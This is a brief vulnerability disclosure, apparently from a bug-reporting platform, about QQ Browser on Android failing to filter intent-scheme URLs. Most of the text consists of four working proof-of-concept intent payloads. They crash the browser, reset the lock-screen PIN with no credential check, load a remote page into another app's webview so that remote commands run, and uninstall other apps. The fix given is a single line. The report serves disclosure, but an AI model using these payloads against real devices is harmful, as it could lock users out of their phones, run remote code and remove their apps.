Improper handling of IntentScheme in qq Browser
Improper handling of IntentScheme in qq Browser
IntentScheme is not filtered, and malicious intent can be implanted.
1. android all: DOS in the browser
intent:#Intent;component=com.tencent.mtt/com.tencent.mtt.debug.DbgMemWatch;end
2. android 3. x-4.3, reset PIN
intent:#Intent;action=android.settings.SETTINGS;S.:android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;end
3. android 4.2.2 execute remote commands in combination with webview of other apps
intent:http://drops.wooyun.org/webview.html#Intent;component=com.android.browser/com.android.browser.BrowserActivity;end
Poc enables the android 4.1 native Browser
4. Uninstall other apps for android all
intent:package:org.wooyun.hiwooyun#Intent;action=android.intent.action.DELETE;end
Browser version
Solution:
Filter intent